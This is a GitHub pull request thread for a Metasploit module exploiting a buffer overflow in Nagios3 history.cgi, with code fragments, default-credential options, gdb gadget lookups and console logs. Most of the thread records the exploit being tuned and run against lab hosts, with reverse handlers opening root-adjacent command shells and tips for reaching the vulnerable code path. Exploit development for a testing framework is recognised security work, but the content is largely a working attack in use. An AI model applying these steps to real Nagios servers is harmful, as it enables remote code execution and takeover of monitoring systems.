Nagios3 history.cgi exploit #1314
Conversation
|
It overlaps with #1313 I'll see what can be done. |
| require 'rex' | ||
|
|
||
| class Metasploit3 < Msf::Exploit::Remote | ||
| Rank = ExcellentRanking |
There was a problem hiding this comment.
Prolly it doesn't fit the requirements for ExcelentRanking. We can redefine it once finished. Just pointing atm.
msf exploit(nagios3_history_cgi) > set RHOST 192.168.1.156 RHOST => 192.168.1.156 msf exploit(nagios3_history_cgi) > set URI /nagios/cgi-bin/history.cgi URI => /nagios/cgi-bin/history.cgi msf exploit(nagios3_history_cgi) > set USER nagiosadmin USER => nagiosadmin msf exploit(nagios3_history_cgi) > set PASS nagiosadmin PASS => nagiosadmin msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(nagios3_history_cgi) > set target 1 target => 1 msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Selected Target: CentOS (nagios-3.4.3-1.el6.i686.rpm) [*] Sending request to http://192.168.1.156:80/nagios/cgi-bin/history.cgi [*] Unknown response [*] 200 msf exploit(nagios3_history_cgi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Target 1 CentOS (nagios-3.4.3-1.el6.i686.rpm) 2 Debian (nagios3_3.0.6-4~lenny2_i386.deb)
[root@localhost ~]# uname -a Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux [root@localhost ~]# cat /etc/redhat-release CentOS release 6.3 (Final) [root@localhost ~]# rpm -qa | grep nagios nagios-3.4.3-1.el6.i686 Testing the debian target and digging into it, will update asap |
| register_options( | ||
| [ | ||
| OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]), | ||
| OptString.new('USER', [false, "The username to authenticate with", "guest"]), |
There was a problem hiding this comment.
In my first installation of nagios for centos, from the epel repo, there is a default nagiosadmin / nagiosadmin user, but not guest / guest, maybe could be a good idea to switch to nagiosadmin / nagiosadmin by default. Not sure if guest / guest are common credentials in other default packages.
|
It's working neither on Debian 5 / nagios3_3.0.6-4~lenny2_i386.deb msf exploit(nagios3_history_cgi) > set RHOST 192.168.1.155 RHOST => 192.168.1.155 msf exploit(nagios3_history_cgi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Target 1 CentOS (nagios-3.4.3-1.el6.i686.rpm) 2 Debian (nagios3_3.0.6-4~lenny2_i386.deb) msf exploit(nagios3_history_cgi) > set target 2 target => 2 msf exploit(nagios3_history_cgi) > set PASS nagiosadmin PASS => nagiosadmin msf exploit(nagios3_history_cgi) > set USER nagiosadmin USER => nagiosadmin msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Selected Target: Debian (nagios3_3.0.6-4~lenny2_i386.deb) [*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi [*] Unknown response
nagios:~# uname -a Linux nagios 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux nagios:~# cat /etc/debian_version 5.0.10 nagios:~# dpkg -l | grep nagios3 ii nagios3 3.0.6-4~lenny2 A host/service/network monitoring and management system |
(gdb) x/2i 0x08048fe4 0x8048fe4 : pop %ebp 0x8048fe5 : ret (gdb) x/i 0x08048c7c 0x8048c7c : jmp *0x8071120
(gdb) x/2i 0x08048f04 0x8048f04 <__snprintf_chk@plt+12>: mov 0xfffffffc,%al 0x8048f09 : and $0x807d1c0,%eax (gdb) x/i 0x08048bb0 0x8048bb0: call 0x80c9385 (gdb) x/i 0x08048e70 0x8048e70 : add %eax,(%eax) (gdb) |
|
Wrong history.cgi . There was a NagiosXI installation in the same box. Let me to get the correct addresses for it. |
|
If Nagios XI uses also a vulnerable history.cgi and you make it work, feel free to add is as new target, more targets, more interesting exploit :) Please only tested and confirmed targets! :) |
|
@jvazquez-r7 this exploit works for me on debian I guess you have your nagios.log almost empty (or rotated). To reach the vulnerable code path you need to have at least a notification (or a alert I don't know exactly) in your Try to kill apache for some minutes and then restart it... (localhost/http is monitored by default) msf exploit(nagioscgi) > exploit [] Started reverse handler on 10.199.1.2:4444 meterpreter > |
|
@danielemartini You're right. We need at least one alert in order to exploit the vulnerability. |
|
Better :) I'm going to proceed with final test, cleanup by myself, credit both you and merge! Thanks very much @jselvi and @danielemartini for an awesome contribution! Great work! msf exploit(nagios3_history_cgi) > set rhost 192.168.1.158 rhost => 192.168.1.158 msf exploit(nagios3_history_cgi) > set TARGETURI /nagios/cgi-bin/history.cgi TARGETURI => /nagios/cgi-bin/history.cgi msf exploit(nagios3_history_cgi) > reload [*] Reloading module... msf exploit(nagios3_history_cgi) > check [*] Checking banner and version... [-] Please specify correct values for USER and PASS [-] No matching target [*] Cannot reliably check exploitability. msf exploit(nagios3_history_cgi) > set pass admin1234 pass => admin1234 msf exploit(nagios3_history_cgi) > check [*] Checking banner and version... [*] Web Server banner: Apache/2.2.15 (CentOS) [*] Nagios version detected: 3.4.1 [+] The target is vulnerable. msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Automatically detecting the target... [*] Web Server banner: Apache/2.2.15 (CentOS) [*] Nagios version detected: 3.4.1 [*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x) [*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi [*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.158:44234) at 2013-01-16 10:24:46 +0100 id; uid=48(apache) gid=48(apache) groups=48(apache),500(nagios),501(nagcmd) ^C Abort session 2? [y/N] y [*] 192.168.1.158 - Command shell session 2 closed. Reason: User exit |
|
After some cleanup exploit working on both centos (nagios xi applicance) and debian, merging! msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Automatically detecting the target... [*] Web Server banner: Apache/2.2.9 (Debian) [*] Nagios version detected: 3.0.6 [*] Selected Target: Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb) [*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi [*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.155:34974) at 2013-01-16 11:50:56 +0100 ^C[-] Exploit failed: Interrupt ^C Abort session 3? [y/N] y [*] 192.168.1.155 - Command shell session 3 closed. Reason: User exit msf exploit(nagios3_history_cgi) > set rhost 192.168.1.158 rhost => 192.168.1.158 msf exploit(nagios3_history_cgi) > set pass admin1234 pass => admin1234 msf exploit(nagios3_history_cgi) > set targeturi /nagios/cgi-bin/history.cgi targeturi => /nagios/cgi-bin/history.cgi msf exploit(nagios3_history_cgi) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Automatically detecting the target... [*] Web Server banner: Apache/2.2.15 (CentOS) [*] Nagios version detected: 3.4.1 [*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x) [*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi [*] Command shell session 4 opened (192.168.1.128:4444 -> 192.168.1.158:46001) at 2013-01-16 11:51:31 +0100 ^C[-] Exploit failed: Interrupt ^C Abort session 4? [y/N] y [*] 192.168.1.158 - Command shell session 4 closed. Reason: User exit |
Nagios3 history.cgi exploit. Based on a blasty's working exploit (http://pastebin.com/FJUNyTaj) and added CentOS target.